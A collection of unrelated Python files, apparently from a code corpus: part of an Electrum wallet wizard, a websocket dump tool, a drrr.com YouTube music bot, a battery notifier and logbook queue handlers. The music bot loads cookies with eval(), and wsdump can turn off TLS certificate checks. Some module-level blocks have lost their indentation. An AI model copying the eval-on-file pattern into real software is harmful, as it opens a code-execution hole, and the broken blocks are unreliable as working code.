            _('To make sure that you have properly saved your seed, please retype it here.')
        ])
        seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
        return seed

    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        """Page: display the generated seed; returns whether 'ext' was chosen."""
        title = _("Your wallet generation seed is:")
        slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
        self.exec_layout(slayout)
        return slayout.is_ext

    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Shared password page; returns (new_password, encrypt_wallet)."""
        playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
                                 force_disable_encrypt_cb=force_disable_encrypt_cb)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.new_password(), playout.encrypt_cb.isChecked()

    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it.  Return
        the password or None for no password."""
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)

    @wizard_dialog
    def request_storage_encryption(self, run_next):
        """Page (hardware wallets): ask whether to encrypt the wallet file."""
        playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()

    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        """Page: simple confirmation (Next continues, Back/close abort)."""
        self.confirm(message, title)

    def confirm(self, message, title):
        label = WWLabel(message)
        vbox = QVBoxLayout()
        vbox.addWidget(label)
        self.exec_layout(vbox, title)

    @wizard_dialog
    def action_dialog(self, action, run_next):
        """Page that just runs a BaseWizard action."""
        self.run(action)

    def terminate(self, **kwargs):
        """Finish the wizard (thread-safe via the accept signal)."""
        self.accept_signal.emit()

    def waiting_dialog(self, task, msg, on_finished=None):
        """Run *task* on a worker thread while showing *msg*, keeping the GUI
        responsive; calls *on_finished* on completion."""
        label = WWLabel(msg)
        vbox = QVBoxLayout()
        vbox.addSpacing(100)
        label.setMinimumWidth(300)
        label.setAlignment(Qt.AlignCenter)
        vbox.addWidget(label)
        self.set_layout(vbox, next_enabled=False)
        self.back_button.setEnabled(False)

        t = threading.Thread(target=task)
        t.start()
        while True:
            t.join(1.0/60)
            if t.is_alive():
                self.refresh_gui()
            else:
                break
        if on_finished:
            on_finished()

    @wizard_dialog
    def choice_dialog(self, title, message, choices, run_next):
        """Page: pick one of *choices* ((value, title) pairs); returns value."""
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        clayout = ChoicesLayout(message, c_titles)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, title)
        action = c_values[clayout.selected_index()]
        return action

    def query_choice(self, msg, choices):
        """called by hardware wallets"""
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, '')
        return clayout.selected_index()

    @wizard_dialog
    def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
                               message2: str, test_text: Callable[[str], int],
                               run_next, default_choice_idx: int=0) -> Tuple[str, str]:
        """Page: radio choice plus a validated text line; each choice supplies
        a default line text.  Returns (line_text, choice_value)."""
        vbox = QVBoxLayout()

        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        c_default_text = [x[2] for x in choices]
        def on_choice_click(clayout):
            idx = clayout.selected_index()
            line.setText(c_default_text[idx])
        clayout = ChoicesLayout(message1, c_titles, on_choice_click,
                                checked_index=default_choice_idx)
        vbox.addLayout(clayout.layout())

        vbox.addSpacing(50)
        vbox.addWidget(WWLabel(message2))

        line = QLineEdit()
        def on_text_change(text):
            self.next_button.setEnabled(test_text(text))
        line.textEdited.connect(on_text_change)
        on_choice_click(clayout)  # set default text for "line"
        vbox.addWidget(line)

        self.exec_layout(vbox, title)
        choice = c_values[clayout.selected_index()]
        return str(line.text()), choice

    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning='',
                    presets=(), warn_issue4566=False):
        """Page: single validated text line with optional preset buttons and
        the issue-4566 whitespace warning for passphrases."""
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)
        def f(text):
            self.next_button.setEnabled(test(text))
            if warn_issue4566:
                text_whitespace_normalised = ' '.join(text.split())
                warn_issue4566_label.setVisible(text != text_whitespace_normalised)
        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))

        warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
        warn_issue4566_label.setVisible(False)
        vbox.addWidget(warn_issue4566_label)

        for preset in presets:
            button = QPushButton(preset[0])
            button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
            button.setMinimumWidth(150)
            hbox = QHBoxLayout()
            hbox.addWidget(button, alignment=Qt.AlignCenter)
            vbox.addLayout(hbox)

        self.exec_layout(vbox, title, next_enabled=test(default))
        return line.text()

    @wizard_dialog
    def show_xpub_dialog(self, xpub, run_next):
        """Page: display the wallet's master public key for sharing."""
        msg = ' '.join([
            _("Here is your master public key."),
            _("Please share it with your cosigners.")
        ])
        vbox = QVBoxLayout()
        layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
        vbox.addLayout(layout.layout())
        self.exec_layout(vbox, _('Master Public Key'))
        return None

    def init_network(self, network):
        """Page: auto-connect vs. manual server selection on first run."""
        message = _("Electrum communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Electrum "
                    "pick one at random. However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)

    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Page: choose the m-of-n multisig parameters; returns (m, n)."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require {0} signatures').format(m))
            cw.set_m(m)
        def on_n(n):
            n_label.setText(_('From {0} cosigners').format(n))
            cw.set_n(n)
            # m can never exceed n.
            m_edit.setMaximum(n)
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
|
wsdump.py | #!/Users/alexzisis/Code/Python/apartment-finder/apartment-finder/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return sys.stdin's encoding lower-cased, defaulting to 'utf-8'
    when stdin reports none."""
    encoding = getattr(sys.stdin, "encoding", "")
    return encoding.lower() if encoding else "utf-8"
# Frame opcodes that carry payload (text/binary) as opposed to control frames.
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# stdin encoding resolved once at import time; used by RawInput below.
ENCODING = get_encoding()
class VAction(argparse.Action):
    """argparse action for the -v flag: a bare flag means 1, a number is
    taken literally, and a run like 'vvv' counts the v's plus one."""

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            values = "1"
        try:
            level = int(values)
        except ValueError:
            level = values.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Build the CLI for the WebSocket dump tool and parse sys.argv."""
    parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    parser.add_argument("url", metavar="ws_url",
                        help="websocket url. ex. ws://echo.websocket.org/")
    parser.add_argument("-p", "--proxy",
                        help="proxy url. ex. http://127.0.0.1:8080")
    parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                        dest="verbose",
                        help="set verbose mode. If set to 1, show opcode. "
                        "If set to 2, enable to trace websocket module")
    parser.add_argument("-n", "--nocert", action='store_true',
                        help="Ignore invalid SSL cert")
    parser.add_argument("-r", "--raw", action="store_true",
                        help="raw output")
    parser.add_argument("-s", "--subprotocols", nargs='*',
                        help="Set subprotocols")
    parser.add_argument("-o", "--origin",
                        help="Set origin")
    parser.add_argument("--eof-wait", default=0, type=int,
                        help="wait time(second) after 'EOF' received.")
    parser.add_argument("-t", "--text",
                        help="Send initial text")
    parser.add_argument("--timings", action="store_true",
                        help="Print timings in seconds")
    parser.add_argument("--headers",
                        help="Set custom headers. Use ',' as separator")

    return parser.parse_args()
class RawInput:
    """Prompt helper that works on both Python 2 and 3 and returns the
    typed line as UTF-8 encoded bytes regardless of terminal encoding."""

    def raw_input(self, prompt):
        """Read one line from the console and normalise it to UTF-8 bytes."""
        if six.PY3:
            line = input(prompt)
        else:
            line = raw_input(prompt)

        # PY2 byte strings in a non-UTF-8 terminal get transcoded; text
        # strings (always on PY3) are simply encoded.
        if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
            line = line.decode(ENCODING).encode("utf-8")
        elif isinstance(line, six.text_type):
            line = line.encode("utf-8")

        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Interactive session: colours incoming messages blue and redraws the
    '> ' prompt so async output doesn't mangle half-typed input."""

    def write(self, data):
        # ANSI: clear the current line and reposition before printing, then
        # re-emit the prompt on a fresh line.
        sys.stdout.write("\033[2K\033[E")
        # sys.stdout.write("\n")
        sys.stdout.write("\033[34m< " + data + "\033[39m")
        sys.stdout.write("\n> ")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Raw mode (-r): plain line-oriented output with no prompt or colours."""

    def write(self, data):
        sys.stdout.write(data)
        sys.stdout.write("\n")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to the WebSocket URL given on the CLI and run a dump session:
    a daemon thread prints incoming frames while the main thread forwards
    console input to the socket."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # -n/--nocert: disable certificate and hostname verification.
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = map(str.strip, args.headers.split(','))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        """Receive one frame; answers PING/CLOSE and returns (opcode, data)."""
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data

        return frame.opcode, frame.data

    def recv_ws():
        """Reader loop: print every received message until the peer closes."""
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if not args.verbose and opcode in OPCODE_DATA:
                msg = data
            elif args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)

            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)

            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()

    if args.text:
        ws.send(args.text)

    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            # --eof-wait: give the reader thread time to drain before exit.
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
music.py | import requests
import time
import json
import re
import os
from random import randint
import threading
import youtube_dl
import sys
import toml
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
class Uploader:
    """Base class for uploading a cached music file to a file host.

    Subclasses set ``filename`` and ``file_host_url`` and implement
    ``execute()`` to perform the upload and return the share link/text.
    """

    def __init__(self, filename, file_host_url):
        # BUG FIX: was ``def __init`` (missing trailing underscores), so
        # the constructor was never invoked and direct instances ended up
        # without ``filename``/``file_host_url`` attributes.
        self.filename = filename
        self.file_host_url = file_host_url

    def _mimetype(self):
        """Best-guess MIME type for ``self.filename``.

        Added because FileioUploader.execute() calls it but no definition
        existed anywhere, causing an AttributeError at upload time.
        """
        import mimetypes
        guessed, _ = mimetypes.guess_type(self.filename)
        return guessed or 'application/octet-stream'

    def _multipart_post(self, data):
        """POST *data* as a streaming multipart form; return the response."""
        encoder = MultipartEncoder(fields=data)
        monitor = MultipartEncoderMonitor(encoder)
        r = requests.post(self.file_host_url,
                          data=monitor,
                          headers={'Content-Type': monitor.content_type})
        return r
class FileioUploader(Uploader):
    """Uploads a cached music file to https://file.io."""

    def __init__(self, filename):
        self.filename = filename
        self.file_host_url = "https://file.io"

    def execute(self):
        """Upload ``./cache/music/<filename>`` and return the download link.

        Network errors propagate from ``requests``; the file handle is
        always closed.
        """
        # ``with`` closes the handle even if the POST raises; the old
        # try/finally also left ``response`` unbound on failure, turning a
        # network error into a confusing NameError.
        with open('./cache/music/{}'.format(self.filename), 'rb') as file:
            data = {'file': (file.name, file, self._mimetype())}
            response = self._multipart_post(data)
        return response.json()['link']
class CatboxUploader(Uploader):
    """Uploads a cached music file to litterbox.catbox.moe (72 h retention)."""

    def __init__(self, filename):
        self.filename = filename
        self.file_host_url = "https://litterbox.catbox.moe/resources/internals/api.php"

    def execute(self):
        """Upload ``./cache/music/<filename>`` and return the hosted URL.

        Network errors propagate from ``requests``; the file handle is
        always closed.
        """
        # ``with`` guarantees cleanup and avoids ``response`` being unbound
        # when the POST raises (the old code returned it outside try/finally).
        with open('./cache/music/{}'.format(self.filename), 'rb') as file:
            data = {
                'reqtype': 'fileupload',
                'time': '72h',
                'fileToUpload': (file.name, file)
            }
            response = self._multipart_post(data)
        return response.text
class musicSistem(object):
    """Music playlist bot for a drrr.com chat room.

    Downloads audio from YouTube via youtube_dl, re-uploads it to a file
    host (catbox / file.io) and shares the resulting link in the room.
    Track sequencing and command cooldowns are coordinated through simple
    boolean flags mutated from multiple threads.
    """

    def __init__(self):
        self.config = toml.load('config.toml')
        self.session = requests.session()
        # Per-command cooldown flags; True means the command is on cooldown.
        self.spam = {"next": False, "skip": False, "pause": False,"music": False,"post_music": False}
        self.music_info = []
        # drrr.com room endpoint used for both chat posts and music shares.
        self.host = 'https://drrr.com/room/?ajax=1'
        self.paylist_cont = 0        # index of the next track to play
        self.paylist_duration = []   # seconds per track, parallel to paylist
        self.paylist = []            # uploaded file-host URLs
        self.paylist_title = []      # track titles, parallel to paylist
        self.listUrl = []            # queued YouTube URLs awaiting download
        self.countMusic = 0          # index of the next URL to download
        self.pause = True
        self.nextCont = 0
        self.playStatus = False      # True while the play loop is running
        self.blockMusic = True       # False disables the music command
        self.name = 'music_1.mp3'    # fixed name of the downloaded file
        self.durationMusic = 600     # max allowed track length, seconds
        self.load_cookie()

    def load_cookie(self):
        """Load the saved drrr.com session cookies into the session.

        NOTE(review): ``eval()`` on the cookie file executes arbitrary
        code; only acceptable while the file is trusted local config.
        """
        f = open(self.config['Botconfig']['cookie'], 'r')
        self.session.cookies.update(eval(f.read()))
        f.close()

    def blockMusicCommand(self):
        """Disable the music command."""
        self.blockMusic = False

    def AnableMusicCommand(self):
        """Re-enable the music command."""
        self.blockMusic = True

    def avoid_spam(self, com):
        """Release the cooldown flag for command *com* after 5 seconds."""
        time.sleep(5)
        self.spam[com] = False

    def default(self):
        """Restore the default 10-minute track length limit."""
        self.durationMusic = 600

    def livre(self):
        """Raise the track length limit to 3 hours ("free" mode)."""
        self.durationMusic = 10800

    def post(self, message, url='', to=''):
        """Post a chat message, optionally with a URL or direct recipient."""
        post_body = {
            'message': message,
            'url': url,
            'to': to
        }
        p = self.session.post(
            url=self.host, data=post_body)
        p.close()

    def share_music(self, url, name=''):
        """Share a playable music URL in the room."""
        share_music_body = {
            'music': 'music',
            'name': name,
            'url': url
        }
        p = self.session.post(
            url=self.host, data=share_music_body)
        p.close()

    def thPlay(self):
        """Start the play loop on a background thread."""
        t_start = threading.Thread(target=self.play)
        t_start.start()

    def play(self):
        """Sequentially share playlist entries, sleeping for each duration.

        Runs until the playlist index runs past the end (the IndexError is
        reported as "Playlist Vazia") or ``self.pause`` is set by another
        thread.
        """
        if self.playStatus == False:
            self.playStatus = True
            self.pause = False
            while True:
                try:
                    if self.pause == False:
                        self.share_music(
                            url=self.paylist[self.paylist_cont], name=self.paylist_title[self.paylist_cont])
                        self.paylist_cont += 1
                        loop = self.paylist_cont - 1
                        # Sleep one second at a time so pause/skip requests
                        # from other threads are noticed quickly.
                        for i in range(0, self.paylist_duration[loop]):
                            if self.pause == True:
                                return
                            time.sleep(1)
                    else:
                        return
                except Exception as e:
                    # Index past the end of the playlist: nothing left.
                    self.post(message="/me Playlist Vazia")
                    self.playStatus = False
                    return
        else:
            self.post(message="/me:Musica em andamento")

    def pause_playlist(self):
        """Pause playback (10 s cooldown)."""
        commandName = 'pause'
        if self.spam[commandName] == False:
            self.spam[commandName] = True
            self.pause = True
            self.playStatus = False
            self.post(message="/me Playlist Pausada")
            time.sleep(10)
            self.avoid_spam(commandName)

    def skip_playlist(self):
        """Skip the current track and restart the play loop."""
        commandName = 'skip'
        if self.spam[commandName] == False:
            self.spam[commandName] = True
            self.pause = True
            self.playStatus = False
            self.post(message="/me Musica Pulada")
            # Short wait so per-track timing is not corrupted.
            time.sleep(2)
            t_skip = threading.Thread(target=self.play)
            t_skip.start()
            self.avoid_spam(commandName)

    def next(self):
        """Announce the upcoming track title (10 s cooldown).

        NOTE: the method name shadows the ``next`` builtin inside the class
        namespace only; callers use ``instance.next()``.
        """
        commandName = 'next'
        if self.spam[commandName] == False:
            self.spam[commandName] = True
            self.playStatus = False
            try:
                self.post(
                    message="/me Proxima Musica: {} ".format(self.paylist_title[self.paylist_cont]))
            except Exception:
                # Index out of range: nothing queued after this track.
                self.post(message="/me Playlist Vazia")
            time.sleep(10)
            self.avoid_spam(commandName)

    def rebotPlaylist(self):
        """Restart playback from the first track."""
        self.post(
            message="/me Restart Playlist Total de Musicas: {}".format(len(self.paylist)))
        self.paylist_cont = 0
        self.pause = True
        self.playStatus = False
        time.sleep(1)
        t_skip = threading.Thread(target=self.play)
        t_skip.start()

    def skipPlaylist(self):
        """Jump past every queued track (playlist effectively emptied)."""
        self.post(message="/me Playlist Skip: {} music".format(len(self.paylist)))
        self.paylist_cont = len(self.paylist)
        self.pause = True
        self.playStatus = False
        time.sleep(1)
        t_skip = threading.Thread(target=self.play)
        t_skip.start()

    def replayPlaylist(self):
        """Replay the previous track (index moved back by two)."""
        self.post(message="/me ▷Replay▷")
        self.paylist_cont = len(self.paylist) - 2
        self.pause = True
        self.playStatus = False
        time.sleep(1)
        t_skip = threading.Thread(target=self.play)
        t_skip.start()

    def downloadMusic(self):
        """Worker loop: hand each queued URL to playlist() on a thread.

        Busy-polls ``listUrl``; the IndexError raised when no new URL is
        queued yet is deliberately swallowed.
        """
        while True:
            if self.spam["music"] == False:
                try:
                    url = self.listUrl[self.countMusic]
                    #print(url)
                    #self.post(message=f"▷Carregando Sua Musica.▷", to=user)
                    t_start = threading.Thread(target=self.playlist, args=(url,))
                    t_start.start()
                    self.countMusic += 1
                except Exception:
                    # No URL at this index yet; keep polling.
                    pass

    def musicList(self, message, name_sender, id_sender):
        """Queue the YouTube link embedded in a chat *message*."""
        link = message[4:].replace(" ", "")
        self.listUrl.append(link)
        self.post(message=f"/me @{name_sender} ▷Carregando...▷")

    def playlist(self, message):
        """Validate, download, upload and enqueue one YouTube track.

        *message* is a YouTube video id.  Length is checked against
        ``durationMusic`` before downloading; the file is converted to mp3,
        uploaded via the chosen Uploader and appended to the playlist.
        """
        commandName = 'music'
        uploader_classes = {
            "catbox": CatboxUploader,
            "fileio": FileioUploader}
        if self.spam[commandName] == False:
            if self.blockMusic == True:
                def upload(self, host, name):
                    # Push the downloaded file to the file host and record
                    # its URL, duration and title in the playlist lists.
                    uploader_class = uploader_classes[host]
                    uploader_instance = uploader_class(name)
                    #print(name)
                    result = uploader_instance.execute()
                    self.paylist.append(result)
                    self.paylist_duration.append(self.music_info['duration'])
                    self.paylist_title.append(self.music_info['title'])
                    os.remove("./cache/music/music_1.mp3")
                def sand_music(self, message):
                    # First pass: metadata-only query to enforce the length
                    # limit without downloading anything.
                    try:
                        link = "https://www.youtube.com/watch?v={}".format(
                            message)
                        ydl_consult = {
                            'quiet': True,
                            'skip_download': True,
                        }
                        with youtube_dl.YoutubeDL(ydl_consult) as ydl:
                            info = ydl.extract_info(link)
                            if info['duration'] > self.durationMusic:
                                self.post(
                                    message="/me Musica cancelada devido a sua duração.!")
                                self.avoid_spam(commandName)
                                return
                    except Exception:
                        self.post(message="/me [Error 404 Not Found]")
                        self.avoid_spam(commandName)
                        return
                    # Second pass: download best audio and convert to mp3.
                    try:
                        #print(message)
                        title = 'music_1'
                        extp = '.webm'
                        ydl_opts = {
                            'format': 'bestaudio/best',
                            'outtmpl': './cache/music/{}{}'.format(title, extp),
                            'postprocessors': [{
                                'key': 'FFmpegExtractAudio',
                                'preferredcodec': 'mp3',
                                'preferredquality': '192',
                            }],
                        }
                        #self.post(message="/me ▷Carregando musica▷")
                        with youtube_dl.YoutubeDL(ydl_opts) as ydl:
                            # link = "https://www.youtube.com/watch?v={}".format(message)
                            filenames = ([link])
                            ydl.download(filenames)
                            self.music_info = info
                            upload(self,host = 'catbox', name = '{}'.format(self.name))
                            self.avoid_spam(commandName)
                            self.post(message=f"/me [add] {self.music_info['title']}")
                    except Exception:
                        self.post(message="/me Erro Link Invalido")
                        self.avoid_spam(commandName)
                self.spam[commandName] = True
                sand_music(self, message=message)
            else:
                self.spam[commandName] = True
                self.post(message='/me Comando Bloqueado')
                self.avoid_spam(commandName)

    def music_help(self, message, name_sender):
        """Post the music usage help image (30 s cooldown)."""
        commandName = 'post_music'
        if self.spam[commandName] == False:
            ajuda_musica = "https://i.imgur.com/hmmERQi.png"
            self.post(message="Como usar musica.",
                      url='{}'.format(ajuda_musica))
            self.spam[commandName] = True
            time.sleep(30)
            self.avoid_spam(commandName)
|
Battery_notification.py | # use terminal to install
"""pip install psutil
pip install pyttsx3
pip install win10toast"""
import psutil
import time
import pyttsx3
from win10toast import ToastNotifier # also need to install win32api
import threading
toaster = ToastNotifier()
x=pyttsx3.init()
x.setProperty('rate',110)
x.setProperty('volume',3)
count = 0
def show_notification(show_text):
    """Show *show_text* as a Windows toast and block until it is dismissed."""
    toaster.show_toast(
        show_text,
        icon_path='battery_indicator.ico',
        duration=10,
    )
    # Poll until the toast disappears so the worker thread running this
    # function does not finish while the notification is still on screen.
    while toaster.notification_active():
        time.sleep(0.005)
def monitor():
    """Poll the battery once per second and alert on low / full charge.

    Below 35% while unplugged, or at/above 98% while plugged in, shows a
    Windows toast (on its own thread, since show_notification blocks) and
    speaks a message through the module-level pyttsx3 engine ``x``.
    """
    while (True):
        time.sleep(1)
        battery = psutil.sensors_battery()
        plugged = battery.power_plugged
        percent = int(battery.percent)
        if percent < 35:
            if plugged == False:
                # Toast runs on a worker thread because show_notification
                # blocks until the toast is dismissed; the trailing comma
                # makes args a one-element tuple.
                processThread = threading.Thread(target=show_notification, args=("Your Battery at "+str(percent)+"% Please plug the cable",))
                processThread.start()
                x.say("Your battery is getting low so charge it right now")
                x.runAndWait()
        elif percent >= 98:
            if plugged == True:
                processThread = threading.Thread(target=show_notification, args=("Charging is getting complete",))
                processThread.start()
                x.say("Charging is getting complete")
                x.runAndWait()
if __name__ == "__main__":
monitor()
|
queues.py | # -*- coding: utf-8 -*-
"""
logbook.queues
~~~~~~~~~~~~~~
This module implements queue backends.
:copyright: (c) 2010 by Armin Ronacher, Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
import json
import threading
from threading import Thread, Lock
import platform
from logbook.base import NOTSET, LogRecord, dispatch_record
from logbook.handlers import Handler, WrapperHandler
from logbook.helpers import PY2, u
if PY2:
from Queue import Empty, Full, Queue as ThreadQueue
else:
from queue import Empty, Full, Queue as ThreadQueue
class RedisHandler(Handler):
    """A handler that sends log messages to a Redis instance.

    It publishes each record as json dump. Requires redis module.

    To receive such records you need to have a running instance of Redis.

    Example setup::

        handler = RedisHandler('http://127.0.0.1', port='9200', key='redis')

    If your Redis instance is password protected, you can securely connect
    passing your password when creating a RedisHandler object.

    Example::

        handler = RedisHandler(password='your_redis_password')

    More info about the default buffer size: wp.me/p3tYJu-3b
    """
    def __init__(self, host='127.0.0.1', port=6379, key='redis',
                 extra_fields=None, flush_threshold=128, flush_time=1,
                 level=NOTSET, filter=None, password=False, bubble=True,
                 context=None, push_method='rpush'):
        Handler.__init__(self, level, filter, bubble)
        try:
            import redis
            from redis import ResponseError
        except ImportError:
            raise RuntimeError('The redis library is required for '
                               'the RedisHandler')

        self.redis = redis.Redis(host=host, port=port, password=password,
                                 decode_responses=True)
        try:
            self.redis.ping()
        except ResponseError:
            raise ResponseError(
                'The password provided is apparently incorrect')
        self.key = key
        self.extra_fields = extra_fields or {}
        self.flush_threshold = flush_threshold
        self.queue = []
        self.lock = Lock()
        self.push_method = push_method

        # Background thread that flushes the queue every `flush_time` secs.
        self._stop_event = threading.Event()
        self._flushing_t = threading.Thread(target=self._flush_task,
                                            args=(flush_time,
                                                  self._stop_event))
        self._flushing_t.daemon = True
        self._flushing_t.start()

    def _flush_task(self, flush_time, stop_event):
        """Flush the buffer to Redis every *flush_time* seconds.

        FIXES: the parameter was named ``time``, shadowing the ``time``
        module, and the passed-in *stop_event* was ignored in favour of
        ``self._stop_event`` (they are the same object; use the argument).
        Also uses ``is_set()`` instead of the deprecated ``isSet()``.
        """
        while not stop_event.is_set():
            with self.lock:
                self._flush_buffer()
            stop_event.wait(flush_time)

    def _flush_buffer(self):
        """Flushes the messaging queue into Redis.

        All values are pushed at once for the same key.

        The method rpush/lpush is defined by push_method argument
        """
        if self.queue:
            getattr(self.redis, self.push_method)(self.key, *self.queue)
        self.queue = []

    def disable_buffering(self):
        """Disables buffering.

        If called, every single message will be directly pushed to Redis.
        """
        self._stop_event.set()
        self.flush_threshold = 1

    def emit(self, record):
        """Emits a pair (key, value) to redis.

        The key is the one provided when creating the handler, or redis if none
        was provided. The value contains both the message and the hostname.
        Extra values are also appended to the message.
        """
        with self.lock:
            r = {"message": record.msg,
                 "host": platform.node(),
                 "level": record.level_name,
                 "time": record.time.isoformat()}
            r.update(self.extra_fields)
            r.update(record.kwargs)
            self.queue.append(json.dumps(r))
            # ``>=`` (not ``==``): disable_buffering() can lower the
            # threshold below the current queue length, in which case an
            # equality test would never fire again and buffered records
            # would only ever be flushed by close().
            if len(self.queue) >= self.flush_threshold:
                self._flush_buffer()

    def close(self):
        # Final flush so no buffered records are lost on shutdown.
        self._flush_buffer()
class MessageQueueHandler(Handler):
    """A handler that acts as a message queue publisher, which publishes each
    record as json dump. Requires the kombu module.

    The queue will be filled with JSON exported log records. To receive such
    log records from a queue you can use the :class:`MessageQueueSubscriber`.

    For an AMQP backend such as RabbitMQ::

        handler = MessageQueueHandler('amqp://guest:guest@localhost//')

    This requires the py-amqp or the librabbitmq client library.

    For Redis (requires redis client library)::

        handler = MessageQueueHandler('redis://localhost:8889/0')

    For MongoDB (requires pymongo)::

        handler = MessageQueueHandler('mongodb://localhost:27017/logging')

    Several other backends are also supported.
    Refer to the `kombu`_ documentation

    .. _kombu: http://kombu.readthedocs.org/en/latest/introduction.html
    """

    def __init__(self, uri=None, queue='logging', level=NOTSET,
                 filter=None, bubble=False):
        Handler.__init__(self, level, filter, bubble)
        try:
            import kombu
        except ImportError:
            raise RuntimeError('The kombu library is required for '
                               'the RabbitMQSubscriber.')
        if uri:
            connection = kombu.Connection(uri)

        # NOTE(review): when ``uri`` is falsy, ``connection`` is unbound and
        # this raises; emit()/close() would also fail — confirm intended.
        self.queue = connection.SimpleQueue(queue)

    def export_record(self, record):
        """Exports the record into a dictionary ready for JSON dumping.
        """
        return record.to_dict(json_safe=True)

    def emit(self, record):
        # Publish the JSON-safe dict onto the configured queue.
        self.queue.put(self.export_record(record))

    def close(self):
        self.queue.close()
RabbitMQHandler = MessageQueueHandler
class ZeroMQHandler(Handler):
    """A handler that acts as a ZeroMQ publisher, which publishes each record
    as json dump. Requires the pyzmq library.

